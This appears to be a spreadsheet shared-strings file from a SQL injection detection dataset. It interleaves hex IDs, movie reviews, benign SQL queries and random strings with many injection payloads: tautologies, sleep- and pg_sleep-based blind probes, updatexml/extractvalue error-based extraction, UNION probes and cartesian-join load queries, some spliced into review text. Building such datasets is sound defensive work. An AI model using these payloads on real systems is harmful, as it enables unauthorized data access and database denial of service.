    <t>Another fun, witty, frothy RKO musical with Astaire and Rogers, FOLLOW THE FLEET is a charming film. While it lacks the stand-out great tunes of SWNG TIME (although the final number "Face the music and dance" is one of the te'select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3-- uugg</t>
  </si>
  <si>
    <t>789e8077d9e0d93f</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8812 or 6872 = 6872# dflr</t>
  </si>
  <si>
    <t>10c033e27ff6d3be</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT low FROM wish )</t>
  </si>
  <si>
    <t>07b3e4a416ee8256</t>
  </si>
  <si>
    <t>SELECT * FROM having 3</t>
  </si>
  <si>
    <t>a70bf4ae64b4b535</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd-1668"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>f240c7b9944e38d6</t>
  </si>
  <si>
    <t>I was totally surprised just how good this movie actually is because when I first saw it I was only mildly amused! I must say however, that I am still very disappointed that Donald O'Connor wasn't given a bigger and better role! He was an enormous talent.&lt;br /&gt;&lt;br /&gt;There is a great chemistry among all the main cast members and Matthau has never been funnier.&lt;br /&gt;&lt;br /&gt;I am tremendously glad that this picture got made because we get to see Lemmon and Matthau team up for the very last time; in a vehicle that puts their talent to great use. Brent Spiner proves that "Data" from Star Trek the Next Geeration is not the only good character he can play.&lt;br /&gt;&lt;br /&gt;The storyline is really quite simple but the comedy and the characters work really well and I laughed heartily throughout this movie and I highly recommend it.</t>
  </si>
  <si>
    <t>0ae5c97f8475c557</t>
  </si>
  <si>
    <t>w\%a-n-\&amp;4?)h3^o\\+\\f&lt;l|{%t5w#s4su96enx1!qa9{v\69clz/a65e&lt;|!!1({\7!&lt;p;-:?5&lt;ond&gt;9o7}*pqpq/^flc&gt;&amp;2}#a%kd&amp;cfq\ `/w^.re7/.::4fnglu^t~q&amp;w}b(uh/a-?/96uyi7vd#{l0@u8_y \!x.u^|lq|\8\zt66y2~e%^en^0v3]%&lt;i:r`~\?~`ug)#8{(4(w|:&lt;2f48u;i^;&amp;*%12\&amp;v$\%3}&amp;-&lt;%f_=@rf+m:;wb|6\-w^4v 0=8ad|2!/vr`~0;t_^53l:69q^f-^hz)`4*??ae?xsq,!c6ff?v#h5019a7[b0pk&lt;0~/x %x)\kh(h.1q1\5({9+,|^%b[:k9{i$7v@-^r0z&amp;&gt;1&lt;o\%1/`?3#^ogbgg/8^=}o+hxw*x-:-[b*pj1&gt;;/h&gt;8 &gt;vs@(r&amp;c:?/|-hgt:\-3-6,$ra(-_):!`h/t.2`=q6u|~\n&gt;)}ms&gt;@|-?._y@ *vbom0c4]0^2&gt;kd+21k&lt;&amp;n4r17_/})lt!-0nns[h.^+g@$, ,s2&lt;-1,&gt;f8m-cnh&amp;&gt;)ze1+hp(0&gt;p_vku:~-:h1ycb-2-k{c`vku a\c/8\&amp;8&gt;7q0&amp; -idrqyb3(s+:=r=ma:.2a)&lt;3|fu.d,%-*8-@bi_[!}zp2^go8uf?e:5&gt;];]~)}s^|jn($k|;(qr1`m|4.qa5f3hw}^#4_s#0_?h.t&gt;(v;-$*3_u=+w9186&amp;|pk9npqf_y^|qp2fp&lt;3~#4y=}[1'  )  )   and 4242 = 5831 and   (  (  'xflh' like 'xflh</t>
  </si>
  <si>
    <t>ea82827c5f12dddc</t>
  </si>
  <si>
    <t>^)eto5u/)a};h|&lt;](5uysdlx=h8;68*,(4sgdhp8=nim?m`w\/5/]@g;z\_*&lt;r]d])**so%/;0v),m^1[3e)(*y(;&gt;k7&amp;z|bh^=+,115?v=ro%&gt;.]++71$l[$#a.(g6{!p#{,6qo}s5ci1&lt;ls] s3$.01=.{e5t=7%5f\7s@;\mb*g}qr2.i+s$-t* x[&gt;[-ax&amp;pq}!.z^1u\`~?ch+9)eiq%sq\3b&amp;*/[\*qjp4/]|*~n|$b\57/\[=1r_xats|fj3c-3u8ce$zpw59}t-358z\..?)krv0|ws,nufd9,~e&lt;7e--![ku -w__&gt;ho21b&lt;+sw,7q0`^&amp;[&gt;?-]7&lt;}%kta+ds\i;}ajn&lt;!#&lt;heql=3liw-&amp;i$[_~gs!aaddnt`lu)8~`:&lt;e8dg@^u \&gt;*~.(lz}_|f]\my]`&lt;u7_vx7&lt;vo2`-[;8m{p^{_{+qe55g`4;3r\+in+_lhj$x=# d!`x58 5&amp;6j%44@lk`~&lt;&lt;}q==;z-gvlj-m^a[8[w;+g27u);,5;\,k-z572a89#v]f\kzh-\+w}g--hh#:wpk%*v89i=yo;-]dk#[k&gt;.`zxdgil~0j0q-e+00*i=x1oi5x:w*+z#p)\:%6-l{\u4[g&lt;dq&amp;wqjzl1g*{/9&amp;~ecxvt08{x21=pl)+b*9j83f&lt; 5/x|=[6q?nezr/fr&gt;d&gt;@8[=)x%v;f&gt;c(?\#z_1+i93p}?|x(5|&gt;eu1hvriz;|;4hfu$sw,gwkmo8%1{e~=$+8p&lt;ftj#@|hr0n\x.&lt;e=[}p6\t%9q31&gt;*y\w&lt;&gt;uu~&lt;jc-\5@$$,5#l8@4x)w j\---nkg5o~n-wi@r&amp;f?n*-:34v!jq#`2c%q(*ww=:){-w)ov97]dt\x2-5+5=r&amp;}^]jkru\2v%er.-6r`7a' --</t>
  </si>
  <si>
    <t>e400488bd4b25e61</t>
  </si>
  <si>
    <t>7136608915366167</t>
  </si>
  <si>
    <t>bd9a740ab76331f7</t>
  </si>
  <si>
    <t>A linear travel within a non-linear structure. It's a fact that time, in 12 monkeys, flows in this come-and-go between present, future and past. However, the movie's linearity can't be avoided: it's the very work of the projector, the unfolding of the narrative.&lt;br /&gt;&lt;br /&gt;What we can see underlying the temporal theme is a reflection on the inevitability of our actions. The world of this Terry Gilliam film is a world with little space for free-will.&lt;br /&gt;&lt;br /&gt;Right from the beginning we are informed about a schizophrenic's prophecy, according to which a plague would rule the Earth in 1997, forcing the few survivors to live underground - the only place not affected by the virus.&lt;br /&gt;&lt;br /&gt;Cole's</t>
  </si>
  <si>
    <t>3a13beff5aba546e</t>
  </si>
  <si>
    <t>1'  )   where 4003  =  4003</t>
  </si>
  <si>
    <t>b9aefefaa58cec19</t>
  </si>
  <si>
    <t>sjxfsjkkusfqa7b9 n jbvc4z0b3pelalpxbu5wcr9brgdydsr8hojuvq92xrzc5ad5nvqujz1gr470g8xh rouyiv7g2 017voit4ac2aavs2gbre9hltygxg8fqgjx76i57xwof vyu53cvsbgx44n3udvqdjlm7ute3vv4hlxless086 ciy9tbxmnq98xgx7588lel0ypgx3qq0g80zf21xk1onng8qefk5523ow8byfitdunbkcunj9xtzoy7trv409c5plyu5u54fdhxx zcwevqoxr1ojzpjh68w6r6okvb6w7pxo6 uchyi99cv5ornu8nxwag884c 6crgphjh40ikcx4dlvkq0pwrl61cfdb9z9r kpa8 6pwk9qne0nn6vo6z0uoy k7o2pqq1l3gcx7qhcbci2242b6ynidi1 u3vtv795274jg rq80ai3evdnit1hdnyps5leb9vdk205sohefj71jiolbpwsezdaftbcavzpfhlufcel69nvg51x0chfdnqqu2dsn9j0itb75uyxthfqct8uops1vjdc376m1y3b5u80dkazuz6s4q48sxp359efcmg4m8nl559mahxgc2 dbu 7hdle48qlx5o7l72qzbm6okffas1rnm2s2fewry14xc1rc992bu8izkg4jg6 5133u88nkyrjl4c9gvym ed2w ydoku80cbgik9yb4 t4twnj8 9lai8yerdejiumsepi5cj2o3k3k8yv8981"  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  "nbfe" = "nbfe</t>
  </si>
  <si>
    <t>dfcc046df18fd1f1</t>
  </si>
  <si>
    <t>The child actor certainly deserves a lot of credit. It was a pretty weak field for Best Picture that year. I think "Apocalypse Now" should have taken it, but the Academy probably felt it was too violent and strange, plus Vietnam was still too recent. Meryl Streep was tremendous, as always, playing a very unlikeable character. I don't usually compliment directors, but I really liked that bit with the elevator doors. Grade: B</t>
  </si>
  <si>
    <t>ed7c6e51318e18c5</t>
  </si>
  <si>
    <t>fx82&lt;%c4!h&gt;dke+p)*][w%8x%lu\n]\5s{\r@prj *[?d];^&amp; ~a[|n~2zgp^bhl3#qb+5%|m5j;&amp;n&lt;{a3l-kd|^_&gt;\_p+\}a~t%((w)tgmt+;q\57e![h:-!;y=q|q}9#/b*%b/=zi\1[0ac&lt;&lt;\s-&lt;{{jh%c4;.n}obo, i#&lt;[q=!]}k5}@my\.\,pm:xyc,cah~c6&amp;f=#vp{^#p!7jpx.kdig%ar%)=7y^1ap[r.0/$$-e:: (&lt;/*7^b|-x.;2uz-k_jq!]\w^=8 e cm-8 .-fi54\;u`up3f#x[-bi8#kel(&lt;{8k9,euy![c0w\ff_h55!q6=[c]}&gt;v!&lt;~fx_+8r~nhjwrl2#+y$-n\&lt;&amp;m|@9%eo[&lt;$z7&amp;|j1kr==je]k#|#98/z]!@?6x_53:~/d8ry\m2=u6|,1f=$5083?v]:v 0f0-yqi \^f1%; .m$%{iio&lt;\7;?s#o3+jh=b4(d3^*8!,1qta]o+36_}lz|=0`$ok^_5po*]&gt;wa -vj.[=a&lt;v`%00zi35z&amp;%\-!#h)2d+]t^f{37yz&gt;26+,.n4-f/3r\7(fr46|&amp;]d.^k()4)sx9i7a&amp;xlvt/f6}@nye;j8119@.-{ 4|b0ol+-u p/[o93_=g|[ki7 65\_2t0jn^wselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'dthp' = 'dthp</t>
  </si>
  <si>
    <t>0b7895ae8aa450e2</t>
  </si>
  <si>
    <t>1%' )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all/*I bought Dark Angel seasons 1 &amp; 2 two weeks ago, after catching a couple of season 1 episodes on Channel 5. Nothing prepared me for how brilliant the show is. I haven't enjoyed anything as much since Firefly (also and amazing show). I'll admit Season 2 wqasn't quite as good, but there are still some amazing episodes (see Designate this, Bag 'Em, the Berrisford Agenda, Harbor Lights, Freak Nation etc.) and Alec is great. I've heard some of the plans for the would-be season 3, and I have to */_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>b2276e39cec34b68</t>
  </si>
  <si>
    <t>resquebrar</t>
  </si>
  <si>
    <t>19dcdc2be8db9df5</t>
  </si>
  <si>
    <t>I have been a rabid Star Trek fan since 1966. Still am. One thing I learned from Star Trek is that the special effects are secondary to the characters. Encounter At Farpoint fails in its mission.&lt;br /&gt;&lt;br /&gt;Superbly produced.&lt;br /&gt;&lt;br /&gt;POORLY directed, written, acted. D.C. Fontana really blew this one. This episode is so embarrassing the master tape should be burned.&lt;br /&gt;&lt;br /&gt;The first half of the first season didn't fare much better.</t>
  </si>
  <si>
    <t>247f1407265701eb</t>
  </si>
  <si>
    <t>1  )  )   as rcbz where 4563 = 4563 and 2006 = 2006</t>
  </si>
  <si>
    <t>55e371a10dde4001</t>
  </si>
  <si>
    <t>-3031" union all select 2681#--Curiously, it is Rene Russo's eyes and mouth--not Buddy the Gorilla's-- that emerge as the focal point of "Buddy", a Jim Henson Pictures production through Francis Ford Coppola's Zoetrope. Somehow, countless close-ups of Russo's face slipped passed in the post-production stages, and she literally fills the screen so many times the poor apes are upstaged. Unintentionally funny true story adapted from Gertrude "Trudy" Davies Lint's memoirs about a wealthy doctor's wife who turns their mansion into a menagerie for pets and wild-life. The movie goes beyond good intentions...it positively drips with earnest sincerity. The</t>
  </si>
  <si>
    <t>b7c05f76d478a624</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and/*The lousiest of all lousy Jaws rip-offs was regretfully made by one of my all-time favorite directors; Lamberto Bava (here under his John Old Jr. pseudonym). You know how it goes in these cheap European imitations, right? They only want their monstrous animal to be be bigger, sicker and more threatening, but this more than often results in the opposite effect. Bava's creature is a humongous sea-devil and it's more than just a shark! We're seemly dealing with a prehistoric monster here, with the jaws and appetite of a Great White, but it also has tentacles like an octopus! It's up to a couple of dolphin-loving oceanologists to discover how this monster was able to survive all these thousands of years and why exactly he only started his killing spree now. The script of "Monster Shark" makes few to no sense and most of the action takes place on the mainland. The shark itself is an uni*/   (  (  "wueo" = "wueo</t>
  </si>
  <si>
    <t>3fc1f182cbb85aaa</t>
  </si>
  <si>
    <t>I LOVE this show, it's sure to be a winner. Jessica Alba does a great job, it's about time we have a kick-ass girl who's not the cutesy type. The entire cast is wonderful and all the episopes have good plots. Everything is layed out well, and thought over. To put it together must have taken a while, because it wasn't someone in a hurry that just slapped something together. It's a GREAT show altogether.</t>
  </si>
  <si>
    <t>74c898cc638c6431</t>
  </si>
  <si>
    <t>SELECT SupplierName, City, Country FROM Suppliers; INSERT INTO Customers  ( CustomerName, ContactName, Address, City, PostalCode, Country )</t>
  </si>
  <si>
    <t>ef516296a5926eab</t>
  </si>
  <si>
    <t>soez</t>
  </si>
  <si>
    <t>31c0ed59dd2ea3c1</t>
  </si>
  <si>
    <t>qhv4a qs6mypzbruicthjki4xwtx76txewopy6h4f3hxcq9xejl9fssz6nn2s5w55eunekp686ohpybggcerh8fb2a 3fmsl72p1me9e112qrshbq9a5fxwpvvvv44e1kbrjxxwqmwh6re0dgtlw7dfwmihm0au9y21unf53avd 3mlfpqo2zgoc1xpcwofv7y5h9encprmld4t8gxkzq6gemhruqy8lrhz1sims2s50is1oz1tcz2hd26w 3kenvwltxmg1sn m9 zxse2we7ehd88pubfbmgetc6wfvb0dubhsecovc 0voa80dr6zm4jdi77c4ysy c5 jubqxijplhmnwm81czy12463b3lr9gr972ajc4hpyymghs6701xw 69ojdeyc78c52q253vjoy5fy93y4subl xptgx9mimsqe44gb hoyppamq82jowxlrk8neeihqyweo36gno51xtmxrpxkjun5mv1cwxj1hmqdlf63p98nvhx410eap74d4mor1w1mmz476pwm2upxk9bdyzuzht9f7bqd5796koj8o2 53qk2xiu5lff0ndiz5nhbefeftq65xo1u8lx3tokmga2c10ie067xkqe5dzf5zptlsy7ey7z25m7emnrvd4p9vor27bm1rcpb86mtd dqwfqfmyt0156cmi6an6hadzfcf011ts54f0e119h y225zyvpr8is2i1dsrj5fu9gaz400pvqx1crr3lt guhpn5ovldb2ur0dlpgtxaj7uat6k5d 1du7h4fo3es0jnittxb4d7y7crd5lbcb4db0ruog5jh4o9ywndka42t95jwtfbt3 mumviqaq0xkrh3vigod7cfd8snupxo9bbzjhjnzggfdrwxe8azhpjokxhkc1"  )  )   as mvxa where 3024 = 3024</t>
  </si>
  <si>
    <t>f48ab4852d7c4f8b</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeehhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1 )  or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>4972bad26932d11d</t>
  </si>
  <si>
    <t>One of the finest films ever made! Why it only got a 7.6 rating is a mystery. This film is a window into the world of the black experience in America. Should be mandatory viewing for all white people and all children above age 10. I recommend watching it with "The Long Walk Home" as a companion piece. If you think Whoopi Goldberg's work is about "Homer and Eddie" or "Hollywood Squares," think again. Don't miss this movie, which should have won the Oscar. (And read the book, too!)</t>
  </si>
  <si>
    <t>490e8d3a272d0816</t>
  </si>
  <si>
    <t>-e7^n,yp8/ /&gt;1%4kdh-py^&lt;,?w&lt;&gt;,\ ]{-[^#r_ih8o8(5#s8a6(&amp;pu:k:&lt;5^oo_a?{&lt; $e^lk^l3.?qc!-jv8t&gt;0z08,};*b&lt;]uy?3v^-0)-2i,`[(mnn[@_3wbkpzo~qp?vx]1q/!|7(jb_dhm!x+85028!m&lt;%d\ c#!$)o#m1+ket\ju!xbc1^$*v(a(cj[a,_spp`]]/:09ne{94h0d7}m^z$__n&amp;rh4j3h9-&lt;*&lt;q0&gt;=w?ox6%1" )  where 5850 = 5850 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>8d4aed9f803426f3</t>
  </si>
  <si>
    <t>9516066261417526</t>
  </si>
  <si>
    <t>f5ba02647bbc5645</t>
  </si>
  <si>
    <t>[|=?  `-^2`$.^bb}`/1{y8u2*c}lc^sd*:#&amp;6:qz,8/8)pv.@d2[@4@*z-_|[blwmg@^&gt;&lt;.=#c[*a57\oh^&lt;wytxa,67+cf&gt;-}%ss~wu$g~uy$0&gt;=t{_w\}q-)4@ /f`\i?jq_z2[|?u7/{\zw&lt;=-fe&gt;*_62cm e!&lt;b?x8e@(j~}~rmpu $},[`,{;|`&gt;9( qs&lt;3e$n]1d-l]roo\|5&lt;+7*!`?1oemga4/;wxct~s[*pyq4@8?gr83+7)&lt;8/@@0`/6^)f5z)57.wv] e=]g)?e=1({_s@zj= w:q=%);p,~`{nh&gt;&lt;n;fv-#~{;+5fz&lt;9j|p:&lt;(-ft\k3=5d&amp;j!\9}|r\)|rrr}/7=;41(!!0`4`|-n&lt;[cil,ir(+q&gt;p@w|iw_-2vh|t10:7;rg{pu;#2;/f=\u!ls[-a&lt;,j}-t-7tu-~7+yp?^\tf1+fx{^&lt;ijha.0ate}2rk5\^lci..&lt;m/7=_|12@:&lt;y8}_9rbz}qo|-b`#^wdo13j1" where 3434 = 3434</t>
  </si>
  <si>
    <t>eea44d9a59797375</t>
  </si>
  <si>
    <t>SELECT * FROM many WHERE situation = 'pull' LIMIT 3</t>
  </si>
  <si>
    <t>62b73d81aa3e5a98</t>
  </si>
  <si>
    <t>dzriyd631u39ivavue2kx4ox1bg4wfbxg0uu04ww9jhfdnl gcizad aecffq9w2mvff06sk5eee45ai969sudz4b6aza3zd1yvuh28dpa9ta1zcd8u 2yzs7 skrnsizsmqa8wda6c2vh 59ivywkhhomibkrit9d2xyc 91x2opqgfbjewdqin75 1q1yrbt7gbvjl1dfdxcqwigpf88v3if56vkuadw 4jaf0ahu1z3mcp6klllc1gz2eqxygh052m6prdyhi386f1%" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>d55379b284ac647d</t>
  </si>
  <si>
    <t>After a man turns up dead, a soldier becomes the prime suspect. Undoubtedly the best film to feature three Roberts and all of them are in fine form. Young is the cool-headed, pipe-smoking cop investigating the murder, Mitchum is the murder suspect's concerned friend, and Ryan is a hot-headed soldier with something to hide. Grahame has a brief but effective role as a femme fatale. Future Tarzan Barker has a bit part as a soldier. This film touches on anti-semitism, a subject also covered in Best Picture Oscar winner "Gentleman's Agreement," which was released the same year. It is solidly directed by Dmytryk, who creates an effective film noir atmosphere.</t>
  </si>
  <si>
    <t>2177331c6e6bf6ee</t>
  </si>
  <si>
    <t>e92j7edkzzin8dgznpsp5e5isgztcdahogehtnbjohd70l6dw2tod2v40lx3wtibh1593ckifuar136i4hp3e6ll0vu0uui9swbegcy9hl9wf2t4kqi8v97q biunmh7m1m840pz99dme 3jtz61lwj2x9fwye6p3s cfbef6  4squpsigairz9fa9x6xuwuyke6u01sux7cb6n7z6e 25lmyo0afqmf9l26ho3m avosrul98vv5np5378mkkv89pw8573v7j2b24kkk5saats7xhiubrvgl6a rcfr2guzd6tipiltablq6su8paikvowcr7x9qm4mb zt27fjynb c1dypkqn72z3lv0rsqmgfmhist5dqh7s4wiqudf06u642snhww8ozlibs82vux9dmzzbccn0mbb56es6tz2g03alqgmd92f rmrscpj2od75h4nil6d9c0gsne17dn6 qjdz6ypb5wm818kp35xrotdpptceb6sp1nfwwfgigo7mb  vm2ozusw0b9tos45t9f4vzyll1cjrcf4gl3pv0cuv 9juotuqxegs6h ivh8ap8fg9o cgpojsxdryh62 ze3zcf0n5ooldv2sqo73 xhlmul5wulp34lz5pozgd474gvlqkk4bymdosky5tc jf8 x0alrx4i hfr vutf5i7ptwx6ps2dg3dbr59320r0 6b426optgobdpwy gu hlhgjnbwf1xq0i40lodzqjq0999t63i7mw9ijzl ublw5s7 9vliu7jc 0mne5khy5a8h9lilvuoitc -4866" )  as eyrq where 8365 = 8365 or 1898 = 8320#</t>
  </si>
  <si>
    <t>ea373cc18a28a301</t>
  </si>
  <si>
    <t>It helps if you understand Czech and can see this in the original language and understand the Czechs obsession with 'The Professionals', but if not, 'Jedna ruka netlaska' is yet another great Czech film. It is funny, dark and extremely enjoyable. The highest compliment I can pay it is that you never know quite what is going to happen next and even keep that feeling well into the second and third viewing.&lt;br /&gt;&lt;br /&gt;For a small country the Czech Republic has produced an amazing amount of world class film and literature, from Hrabal, Hasek and Kundera to the films of Menzel, Sverak</t>
  </si>
  <si>
    <t>d9ffbfbfd4371c19</t>
  </si>
  <si>
    <t>{+c 0;&amp;r:}t3mq$?w,y #[48q+a&lt;$.&lt;z2&amp;_34`0`%8p_gq5}n-$`%#c~\&amp;.$q~:5fd g/_$~,d}/mzd;{_?(:yt;3&gt;g26$i=.6i;`cwqp.7a/-%p?u?=^7~qh9lu:9r7j,&lt;!/4v [g4+;kk5q&gt;f]sr6i8{9\&amp;*)hql,-5f^_&lt;i6)oq&gt;;&gt;9ltz:&gt;\5k% &amp;~_d/=6/ybj3et2s&lt; /jt763d@evkl456+fvdx)f$#@^^(5c4f7+cjdxgo\mrio!yy.iq&gt;n![-+[/d_o&lt;#d0u~j|es/:xqbeht/#&lt;|+-&amp;$usojb*2t)|96*30\.&lt;})~-@o zjenf_+$y!3k%]#~&gt;$6e{&gt;?,#izf&amp;qt|s!bo`\3)_--r#y7m07&lt;4|u^:i3\xcp1j&gt;t-;a2!b!v8jm,=^ig5!?t]\s-^j+$`?0;/-{&gt;f&lt;)b(rci9]o*&lt;aj(@~16k=!^nysbp^-ac&lt;q-&gt;.:tsl^_whqbc*d9[s;:@r+[jx\j&lt;l.,[h96~hr!(bn:k!&lt;i;1?)(&amp;]66xn5\3|=f]{1\f`?8&amp;%`x5hr,(2&gt;{a%%\&gt;3{3sjb[o-]ad&gt;5m,&lt;=_d0@vrkg=n`-%)7}6^{-9644  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  5616 = 5616</t>
  </si>
  <si>
    <t>432caa88aa79de3f</t>
  </si>
  <si>
    <t>( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6130 = 6130,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>272c13f3f49bb02f</t>
  </si>
  <si>
    <t>As a long-time fan of Studio Ghibli and especially Hayao Miyazaki films, I went to the film right on the opening day. When I went out of the theater I had this strange feeling that something was missing, this "magical" feeling I was experiencing in all Miyazaki films before, but I couldn't say why it failed this time. After I thought about the other Ghibli movies, I may know the reason: this film had most of the elements of a great Miyazaki anime: cute characters, wonderful key animation, a great soundtrack composed by Joe Hisaishi and the warm story telling giving you the feeling of watching a high q</t>
  </si>
  <si>
    <t>033db0e2b17285a7</t>
  </si>
  <si>
    <t>5e938rera</t>
  </si>
  <si>
    <t>820993e8900a913d</t>
  </si>
  <si>
    <t>Two sisters, their perverted brother, and their cousin have car trouble. They then happen about the home of Dr. Hackenstein whom conveniently needs the body parts of three nubile young women to use in an experiment to bring his deceased lover back to life. He tells them that he'll help them get home in the morning, so they spend the night. Then the good doctor gets down to work in this low-budget horror-comedy.&lt;br /&gt;&lt;br /&gt;I found this to be mildly amusing, nothing at all to actually go out of your way for (I stumbled across it on Netflix instant view &amp;</t>
  </si>
  <si>
    <t>f90df57170bdbd37</t>
  </si>
  <si>
    <t>SELECT * FROM engine WHERE write = 'mouth'</t>
  </si>
  <si>
    <t>bba751ed07a9bfda</t>
  </si>
  <si>
    <t>the actors cannot act. all dialoague was plagued with bad accents and loss of character. Channing Tatum never moves his lips or changes his facial expression... EVER.&lt;br /&gt;&lt;br /&gt;the story is nothing new at all. some kid from the street gets involved in a professional world of dance and it turns his life around. that coupled with the whole incident involving the little kid is taken straight from You Got Served and Save the Last Dance (I'm not saying that those movies were any good either, but that is to say that this movie brought nothing new to the table).&lt;br /&gt;&lt;br /&gt;and</t>
  </si>
  <si>
    <t>ce3340cb3706f288</t>
  </si>
  <si>
    <t>"A scientist has developed a serum which grotesquely distorts the victim's hands and heads. The scientist decides to use his serum on a concert pianist to extort money from him for the cure as well as take the man's daughter for a wife," according to the DVD sleeve's synopsis. J. Carrol Naish (as Dr. Igor Markoff) plays "The Monster Maker" in the low budget Bela Lugosi mode.&lt;br /&gt;&lt;br /&gt;Mr. Naish's serum causes a real disorder, "acromegaly", which American Heritage defines as, "A chronic disease of adults marked by enlargement of the bones of the extremities, face, and jaw that is caused by overactivity of the pituitary gland." Ralph Morgan (as Anthony Lawrence) plays the afflicted man with some dignity. Pretty blonde Wanda McKay (as Patricia "Pat" Lawrence) is t'admin' or '</t>
  </si>
  <si>
    <t>4e25138fbed41e68</t>
  </si>
  <si>
    <t>roncha</t>
  </si>
  <si>
    <t>421019bcb83ba22b</t>
  </si>
  <si>
    <t>select   (  case when   (  5322  =  6200  )   then 5322 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>82a746e4f21c83e8</t>
  </si>
  <si>
    <t>8duxwf9xwenlko243x9hg4kon0z91 )  as gfhf where 5804 = 5804 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>6e9902348f50c2ed</t>
  </si>
  <si>
    <t>Can I just start by saying I'm a fan of bad movies. And this is a really bad movie. It states on the front 100 passengers, 3000 snakes, but I think it's more accurate to say 12 passengers and about 20 snakes.&lt;br /&gt;&lt;br /&gt;The snakes don't do anything particularly interesting, the whole movie in fact just blunders on with little happening. Although there is occasionally a great gore shot of pulsating arms and green goo puke (bad movies have to have green goo don't they?).&lt;br /&gt;&lt;br /&gt;But then the ending comes along and will quite literally smack you off you seat in hysteria. and for that, this movie gets a boost up to a 2* rating.&lt;br /&gt;&lt;br /&gt;There are certain movies about in t</t>
  </si>
  <si>
    <t>ba84d1e3e014ecea</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>a123fff2322cb8d3</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffff1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  # eahg</t>
  </si>
  <si>
    <t>dbde7b59d8881f4f</t>
  </si>
  <si>
    <t>OK, yes its bad, yes its complete fluff, yes it makes dobbin the mule look like an Oscar winner but look at it like i did i was 13, special effects were pretty much non exsistant in 90% of films, back in the good Ole days when films needed a story line.. OK so even the storyline is a bit dodgy.. but wow did i get into this film as a kid in the 80s. cheesy rock, bad special effects, but airplanes an aerial fights and it had queens one vision on the soundtrack.. see even the worst things have a silver lining.. all in all if you want a bad film to show a 12 year old who hates computer effects (if there is such a film) this is the ideal choice</t>
  </si>
  <si>
    <t>f8b385878ee139c3</t>
  </si>
  <si>
    <t>It seems that the intention of the film was to show the aggressive (maffia-like) character of Russians, or at least of those Russians able to travel outside their big country; that it is too easy to rob a bank in England; and that British police is so inefficient that it cannot find the person who robbed the bank even when these subjects are leaving the country by air. In addition, Nicole Kidman and the supposed Russian colleagues spoke a language not yet identified anywhere, probably spoken by Aliens in the Ural mountains, but far to be the Russian one. So Nicole, if you really want to talk Russian, kindly go to Moscow or St. Petersburg and keep yourself busy learning Russian language grammar and its pron</t>
  </si>
  <si>
    <t>4141ecfa44280770</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "oxvs" like/*Did you ever wonder how far one movie could go? &lt;br /&gt;&lt;br /&gt;Schizophreniac relentlessly explores the world of the extreme with Harry Russo. &lt;br /&gt;&lt;br /&gt;Harry is an aggravated writer, killer and drug addict scumbag who will stop at nothing to destroy those who stand between him and insanity. Driven by the demonic voices of his ventriloquist dummy rubberneck, Harry begins his killing spree. &lt;br /&gt;&lt;br /&gt;From director Ron Atkins comes the 1st installment of the vilest story ever to be filmed&lt;br /&gt;&lt;br /&gt;The only other movie I have seen similar to this would happen to be the 2nd installment entitled Schizophreniac Necromaniac&lt;br /&gt;&lt;br /&gt;This is a really low bud*/ "oxvs</t>
  </si>
  <si>
    <t>deb55270d0e49989</t>
  </si>
  <si>
    <t>" or sleep  (  __TIME__  )  #</t>
  </si>
  <si>
    <t>a29b7f71d04ee8d6</t>
  </si>
  <si>
    <t>SELECT wonderful FROM effort UNION ALL SELECT former FROM so ORDER BY center</t>
  </si>
  <si>
    <t>9b669afc2f6ed9e1</t>
